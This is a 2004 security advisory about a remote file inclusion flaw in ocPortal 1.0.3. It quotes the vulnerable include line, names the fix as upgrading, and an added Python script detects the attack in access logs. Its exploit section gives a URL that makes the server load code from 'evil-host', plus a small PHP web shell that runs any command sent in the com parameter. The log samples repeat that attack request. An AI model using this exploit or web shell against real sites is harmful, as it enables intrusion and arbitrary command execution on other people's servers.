
Hackgen Security Advisory 2004.2

Posted Oct 24, 2004
Authored by Exoduks, Hackgen | Site hackgen.org

ocPortal is a Content Management System and portal. ocPortal versions up to 1.0.3 may allow for execution of commands via included scripts on the system where it is installed.

tags | advisory
SHA-256 | eca3b9732f89bcc8ba47ae442b4066acc6b229b03d92e81739b856751de8094c

http://www.hackgen.org/advisories/hackgen-2004-002.txt

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' [hackgen-2004-#002] '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Remote file inclusion bug in ocPortal 1.0.3. '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

Software: ocPortal <= 1.0.3
Homepage: http://ocportal.com
Author: "Exoduks" - HackGen Team
Release Date: 11 October, 2004
Website: www.hackgen.org
Mail: exoduks [at] gmail . com



0x01 - Affected software description:
-------------------------------------
ocPortal is the leader in community CMS and portal software for the web.
It allows you to create and configure your own website within minutes.
It's packed full of innovative features that you will not find in competing
software (such as support for multi-site networks, or flexible page view
permissions), taking a completely different approach to the mainstream
competition. ocPortal can seamlessly integrate with most major forum systems,
has an innovative point system for your members to enjoy, support for all your
content (downloads, banners, galleries, and more), the ability to add new pages
as easily as writing a text file, and produces robust and standard compliant
pages. No other CMS package can do all of that.
// from ocportal.com



0x02 - Vulnerability Description:
---------------------------------
This vulnerability exists in index.php because the $req_path variable is used
in an include path without any check. An attacker can change the path to an
evil host where a funcs.php script is located, and that script can even run
system commands on the server. Because system commands can be run through the
evil script, this is a very critical bug. I suggest that you immediately get the
new version of this portal.



0x03 - Vulnerability Code:
--------------------------
The vulnerable code is at the beginning of index.php

----- beginning of the code in index.php -----

if (!isset($req_path)) $req_path="";
require_once($req_path."funcs.php");

----- end of the code -----



0x04 - How to fix this bug:
---------------------------
The vendor has already published a new script with this fix, and you can get new
versions of this portal from http://ocportal.com/



0x05 - Exploit:
----------------

http://localhost/ocp-103/index.php?req_path=http://evil-host/

On your evil host you must put the script funcs.php.
Example of funcs.php if your host doesn't support PHP:

<?php
$com = $_GET["com"];
system ("$com");
?>

Example of funcs.php if your host supports PHP:

<?php
echo '<?php $com = $_GET["com"]; system ("$com"); ?>';
?>

http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls
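
A defensive check for the request pattern shown above, as an added example that is not part of the original advisory: it scans web server access-log lines for requests that set req_path to a URL, including percent-encoded values that a plain text search for "req_path=http" would miss. The log lines are constructed samples, and the function name remote_include_attempts is hypothetical.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Request line inside an access-log entry: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that begins with a URL scheme or stream wrapper (http://, ftp://, php://, data:)
# or with a scheme-relative "//host" prefix
SCHEME_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|data:|//)', re.IGNORECASE)


def remote_include_attempts(log_lines, param="req_path"):
    """Return (line_number, decoded_value) for requests whose `param` is a URL."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line this parser understands
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes names and values, so encoded URLs are normalised
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name == param and SCHEME_RE.match(value):
                hits.append((number, value))
    return hits


# Constructed sample log lines (not taken from a real server)
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Oct/2004:10:00:01 +0200] '
    '"GET /ocp-103/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [11/Oct/2004:10:02:13 +0200] '
    '"GET /ocp-103/index.php?req_path=http://evil-host/&com=ls HTTP/1.1" 200 311',
    '192.0.2.44 - - [11/Oct/2004:10:02:40 +0200] '
    '"GET /ocp-103/index.php?req_path=http%3A%2F%2Fevil-host%2F HTTP/1.0" 200 298',
    '192.0.2.77 - - [11/Oct/2004:10:05:09 +0200] '
    '"GET /ocp-103/index.php?page=news&req_path=sources/ HTTP/1.1" 200 4890',
]

if __name__ == "__main__":
    for number, value in remote_include_attempts(SAMPLE_LOG):
        print(f"line {number}: req_path -> {value}")
```

A hit on any ocPortal <= 1.0.3 installation is worth following up, since a legitimate request has no reason to supply req_path as a URL.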



0x06 - The End:
---------------
The end of my second advisory. There will be more advisories but I don't know
when :). Till then you can visit http://forum.hackgen.org.
Greetz to: All Croatian people, especially Downbload!



______________________________________
Written By Exoduks - www.hackgen.org
